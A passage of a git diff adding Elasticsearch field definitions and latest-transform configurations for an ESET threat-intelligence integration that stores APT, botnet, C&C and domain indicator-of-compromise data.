1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: hostname + level: core + type: keyword + ignore_above: 1024 + description: 'Hostname of the host. + + It normally contains what the `hostname` command returns on the host machine.' + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. + + As hostname is not always unique, use values that are meaningful in your environment. + + Example: The current usage of `beat.name`.' + - name: ip + level: core + type: ip + description: Host ip addresses. + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. + + It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + +- name: input.type + type: keyword + description: Input type. diff --git a/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/fields/base-fields.yml b/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/fields/base-fields.yml new file mode 100644 index 00000000000..7c798f4534c --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/fields/base-fields.yml @@ -0,0 +1,12 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: '@timestamp' + type: date + description: Event timestamp. diff --git a/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/fields/ecs.yml b/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/fields/ecs.yml new file mode 100644 index 00000000000..5162c5f7184 --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/fields/ecs.yml @@ -0,0 +1,92 @@ +- external: ecs + name: ecs.version +- external: ecs + name: message +- external: ecs + name: error.message +- external: ecs + name: event.category +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.original +- external: ecs + name: event.created +- external: ecs + name: tags +- external: ecs + name: threat.indicator.name +- external: ecs + name: threat.indicator.confidence +- external: ecs + name: threat.indicator.url.original +- external: ecs + name: threat.indicator.type +- external: ecs + name: threat.indicator.description +- external: ecs + name: threat.indicator.modified_at +- external: ecs + name: threat.indicator.last_seen +- external: ecs + name: threat.feed.name +- external: ecs + name: threat.indicator.email.address +- external: ecs + name: threat.indicator.file.hash.md5 +- external: ecs + name: threat.indicator.file.hash.sha1 +- external: ecs + name: threat.indicator.file.hash.sha256 +- external: ecs + name: threat.indicator.file.name +- external: ecs + name: threat.indicator.provider +- external: ecs + name: threat.indicator.url.domain +- external: ecs + name: threat.indicator.url.path +- external: ecs + name: threat.indicator.url.port +- external: ecs + name: threat.indicator.url.scheme +- external: ecs + name: threat.indicator.x509.issuer.common_name +- external: ecs + name: threat.indicator.x509.issuer.country +- external: ecs + name: threat.indicator.x509.issuer.distinguished_name +- external: ecs + name: threat.indicator.x509.issuer.locality +- external: ecs + name: threat.indicator.x509.issuer.organization +- external: ecs + name: threat.indicator.x509.issuer.state_or_province +- external: ecs + name: threat.indicator.x509.issuer.organizational_unit +- external: ecs + name: threat.indicator.x509.not_after +- external: ecs + name: threat.indicator.x509.not_before +- external: ecs + name: threat.indicator.x509.serial_number +- external: ecs + name: threat.indicator.x509.signature_algorithm +- external: ecs + name: threat.indicator.x509.subject.common_name +- external: ecs + name: threat.indicator.x509.subject.country +- external: ecs + name: threat.indicator.x509.subject.distinguished_name +- external: ecs + name: threat.indicator.x509.subject.locality +- external: ecs + name: threat.indicator.x509.subject.organization +- external: ecs + name: threat.indicator.x509.subject.state_or_province +- external: ecs + name: threat.indicator.x509.subject.organizational_unit +- external: ecs + name: threat.indicator.x509.version_number diff --git a/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/fields/fields.yml b/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/fields/fields.yml new file mode 100644 index 00000000000..3191e3eaf04 --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/fields/fields.yml @@ -0,0 +1,33 @@ +- name: eset + type: group + description: > + Fields for ESET Threat Intelligence + + fields: + - name: id + type: keyword + description: The UID of the event object. + - name: category + type: keyword + description: > + Event category as defined by MISP. + + - name: meta_category + type: keyword + description: > + Event sub-category as defined by MISP. + + - name: name + type: keyword + description: > + Human readable name describing the event. + + - name: type + type: keyword + description: > + Type of the event. + + - name: valid_until + type: date + description: >- + Event expiration date. diff --git a/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/manifest.yml b/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/manifest.yml new file mode 100644 index 00000000000..f9e3e588fd4 --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/manifest.yml @@ -0,0 +1,18 @@ +destination_index_template: + mappings: + date_detection: false + dynamic: true + dynamic_templates: + - strings_as_keyword: + mapping: + ignore_above: 1024 + type: keyword + match_mapping_type: string + settings: + index: + sort: + field: + - '@timestamp' + order: + - desc +start: true diff --git a/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/transform.yml b/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/transform.yml new file mode 100644 index 00000000000..c37dbd7a160 --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/apt_latest_ioc/transform.yml @@ -0,0 +1,26 @@ +_meta: + fleet_transform_version: 0.1.0 + managed: true +description: Latest ESET APT IoC data +dest: + index: logs-ti_eset_latest.dest_apt-1 + aliases: + - alias: logs-ti_eset_latest.apt + move_on_creation: true +frequency: 30s +latest: + sort: '@timestamp' + unique_key: + - event.dataset + - eset.id +retention_policy: + time: + field: eset.valid_until + max_age: 1m +source: + index: + - logs-ti_eset.apt-* +sync: + time: + delay: 120s + field: event.ingested diff --git a/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/fields/agent.yml b/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/fields/agent.yml new file mode 100644 index 00000000000..845b84ed9c0 --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/fields/agent.yml @@ -0,0 +1,201 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. +- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: hostname + level: core + type: keyword + ignore_above: 1024 + description: 'Hostname of the host. + + It normally contains what the `hostname` command returns on the host machine.' + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. + + As hostname is not always unique, use values that are meaningful in your environment. + + Example: The current usage of `beat.name`.' + - name: ip + level: core + type: ip + description: Host ip addresses. + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. + + It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + +- name: input.type + type: keyword + description: Input type. diff --git a/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/fields/base-fields.yml b/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/fields/base-fields.yml new file mode 100644 index 00000000000..7c798f4534c --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/fields/base-fields.yml @@ -0,0 +1,12 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: '@timestamp' + type: date + description: Event timestamp. diff --git a/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/fields/ecs.yml b/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/fields/ecs.yml new file mode 100644 index 00000000000..43534883f1c --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/fields/ecs.yml @@ -0,0 +1,42 @@ +- external: ecs + name: ecs.version +- external: ecs + name: message +- external: ecs + name: error.message +- external: ecs + name: event.category +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.original +- external: ecs + name: event.created +- external: ecs + name: tags +- external: ecs + name: threat.indicator.name +- external: ecs + name: threat.indicator.confidence +- external: ecs + name: threat.indicator.provider +- external: ecs + name: threat.indicator.url.original +- external: ecs + name: threat.indicator.file.hash.md5 +- external: ecs + name: threat.indicator.file.hash.sha1 +- external: ecs + name: threat.indicator.file.hash.sha256 +- external: ecs + name: threat.indicator.type +- external: ecs + name: threat.indicator.description +- external: ecs + name: threat.indicator.modified_at +- external: ecs + name: threat.indicator.last_seen +- external: ecs + name: threat.feed.name diff --git a/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/fields/fields.yml b/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/fields/fields.yml new file mode 100644 index 00000000000..18accf0bda4 --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/fields/fields.yml @@ -0,0 +1,17 @@ +- name: eset + type: group + description: > + Fields for ESET Threat Intelligence + + fields: + - name: id + type: keyword + description: The UID of the event object. + - name: valid_until + type: date + description: >- + Event expiration date. + - name: labels + type: keyword + description: >- + Threat labels. diff --git a/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/manifest.yml b/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/manifest.yml new file mode 100644 index 00000000000..f9e3e588fd4 --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/manifest.yml @@ -0,0 +1,18 @@ +destination_index_template: + mappings: + date_detection: false + dynamic: true + dynamic_templates: + - strings_as_keyword: + mapping: + ignore_above: 1024 + type: keyword + match_mapping_type: string + settings: + index: + sort: + field: + - '@timestamp' + order: + - desc +start: true diff --git a/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/transform.yml b/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/transform.yml new file mode 100644 index 00000000000..e7cbc7ea9fb --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/botnet_latest_ioc/transform.yml @@ -0,0 +1,26 @@ +_meta: + fleet_transform_version: 0.1.0 + managed: true +description: Latest ESET Botnet IoC data +dest: + index: logs-ti_eset_latest.dest_botnet-1 + aliases: + - alias: logs-ti_eset_latest.botnet + move_on_creation: true +frequency: 30s +latest: + sort: '@timestamp' + unique_key: + - event.dataset + - eset.id +retention_policy: + time: + field: eset.valid_until + max_age: 1m +source: + index: + - logs-ti_eset.botnet-* +sync: + time: + delay: 120s + field: event.ingested diff --git a/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/fields/agent.yml b/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/fields/agent.yml new file mode 100644 index 00000000000..845b84ed9c0 --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/fields/agent.yml @@ -0,0 +1,201 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. +- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: hostname + level: core + type: keyword + ignore_above: 1024 + description: 'Hostname of the host. + + It normally contains what the `hostname` command returns on the host machine.' + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. + + As hostname is not always unique, use values that are meaningful in your environment. + + Example: The current usage of `beat.name`.' + - name: ip + level: core + type: ip + description: Host ip addresses. + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. + + It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + +- name: input.type + type: keyword + description: Input type. diff --git a/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/fields/base-fields.yml b/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/fields/base-fields.yml new file mode 100644 index 00000000000..7c798f4534c --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/fields/base-fields.yml @@ -0,0 +1,12 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: '@timestamp' + type: date + description: Event timestamp. diff --git a/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/fields/ecs.yml b/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/fields/ecs.yml new file mode 100644 index 00000000000..d3f9633c4c9 --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/fields/ecs.yml @@ -0,0 +1,36 @@ +- external: ecs + name: ecs.version +- external: ecs + name: message +- external: ecs + name: error.message +- external: ecs + name: event.category +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.original +- external: ecs + name: event.created +- external: ecs + name: tags +- external: ecs + name: threat.indicator.name +- external: ecs + name: threat.indicator.confidence +- external: ecs + name: threat.indicator.provider +- external: ecs + name: threat.indicator.url.original +- external: ecs + name: threat.indicator.type +- external: ecs + name: threat.indicator.description +- external: ecs + name: threat.indicator.modified_at +- external: ecs + name: threat.indicator.last_seen +- external: ecs + name: threat.feed.name diff --git a/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/fields/fields.yml b/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/fields/fields.yml new file mode 100644 index 00000000000..18accf0bda4 --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/fields/fields.yml @@ -0,0 +1,17 @@ +- name: eset + type: group + description: > + Fields for ESET Threat Intelligence + + fields: + - name: id + type: keyword + description: The UID of the event object. + - name: valid_until + type: date + description: >- + Event expiration date. + - name: labels + type: keyword + description: >- + Threat labels. diff --git a/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/manifest.yml b/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/manifest.yml new file mode 100644 index 00000000000..f9e3e588fd4 --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/manifest.yml @@ -0,0 +1,18 @@ +destination_index_template: + mappings: + date_detection: false + dynamic: true + dynamic_templates: + - strings_as_keyword: + mapping: + ignore_above: 1024 + type: keyword + match_mapping_type: string + settings: + index: + sort: + field: + - '@timestamp' + order: + - desc +start: true diff --git a/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/transform.yml b/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/transform.yml new file mode 100644 index 00000000000..b87d72909c8 --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/cc_latest_ioc/transform.yml @@ -0,0 +1,26 @@ +_meta: + fleet_transform_version: 0.1.0 + managed: true +description: Latest ESET C&C IoC data +dest: + index: logs-ti_eset_latest.dest_cc-1 + aliases: + - alias: logs-ti_eset_latest.cc + move_on_creation: true +frequency: 30s +latest: + sort: '@timestamp' + unique_key: + - event.dataset + - eset.id +retention_policy: + time: + field: eset.valid_until + max_age: 1m +source: + index: + - logs-ti_eset.cc-* +sync: + time: + delay: 120s + field: event.ingested diff --git a/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/fields/agent.yml b/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/fields/agent.yml new file mode 100644 index 00000000000..845b84ed9c0 --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/fields/agent.yml @@ -0,0 +1,201 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. +- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: hostname + level: core + type: keyword + ignore_above: 1024 + description: 'Hostname of the host. + + It normally contains what the `hostname` command returns on the host machine.' + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. + + As hostname is not always unique, use values that are meaningful in your environment. + + Example: The current usage of `beat.name`.' + - name: ip + level: core + type: ip + description: Host ip addresses. + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. + + It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + +- name: input.type + type: keyword + description: Input type. diff --git a/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/fields/base-fields.yml b/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/fields/base-fields.yml new file mode 100644 index 00000000000..7c798f4534c --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/fields/base-fields.yml @@ -0,0 +1,12 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: '@timestamp' + type: date + description: Event timestamp. diff --git a/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/fields/ecs.yml b/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/fields/ecs.yml new file mode 100644 index 00000000000..f127a34e100 --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/fields/ecs.yml @@ -0,0 +1,38 @@ +- external: ecs + name: ecs.version +- external: ecs + name: message +- external: ecs + name: error.message +- external: ecs + name: event.category +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.original +- external: ecs + name: event.created +- external: ecs + name: tags +- external: ecs + name: threat.indicator.name +- external: ecs + name: threat.indicator.confidence +- external: ecs + name: threat.indicator.provider +- external: ecs + name: threat.indicator.url.original +- external: ecs + name: threat.indicator.url.domain +- external: ecs + name: threat.indicator.type +- external: ecs + name: threat.indicator.description +- external: ecs + name: threat.indicator.modified_at +- external: ecs + name: threat.indicator.last_seen +- external: ecs + name: threat.feed.name diff --git a/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/fields/fields.yml b/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/fields/fields.yml new file mode 100644 index 00000000000..18accf0bda4 --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/fields/fields.yml @@ -0,0 +1,17 @@ +- name: eset + type: group + description: > + Fields for ESET Threat Intelligence + + fields: + - name: id + type: keyword + description: The UID of the event object. + - name: valid_until + type: date + description: >- + Event expiration date. + - name: labels + type: keyword + description: >- + Threat labels. diff --git a/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/manifest.yml b/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/manifest.yml new file mode 100644 index 00000000000..f9e3e588fd4 --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/manifest.yml @@ -0,0 +1,18 @@ +destination_index_template: + mappings: + date_detection: false + dynamic: true + dynamic_templates: + - strings_as_keyword: + mapping: + ignore_above: 1024 + type: keyword + match_mapping_type: string + settings: + index: + sort: + field: + - '@timestamp' + order: + - desc +start: true diff --git a/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/transform.yml b/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/transform.yml new file mode 100644 index 00000000000..1b2615a9972 --- /dev/null +++ b/packages/ti_eset/elasticsearch/transform/domains_latest_ioc/transform.yml @@ -0,0 +1,26 @@ +_meta: + fleet_transform_version: 0.1.0 + managed: true +description: Latest ESET Domains IoC data +dest: + index: logs-ti_eset_latest.dest_domains-1 + aliases: + - alias: logs-ti_eset_latest.domains + move_on_creation: true +frequency: 30s +latest: + sort: '@timestamp' + unique_key: + - event.dataset + - eset.id +retention_policy: + time: + field: eset.valid_until + max_age: 1m +source: + index: + - logs-ti_eset.domains-* +sync: + time: + delay: 120s + field: event.ingested diff --git a/packages/ti_eset/elasticsearch/transform/files_latest_ioc/fields/agent.yml 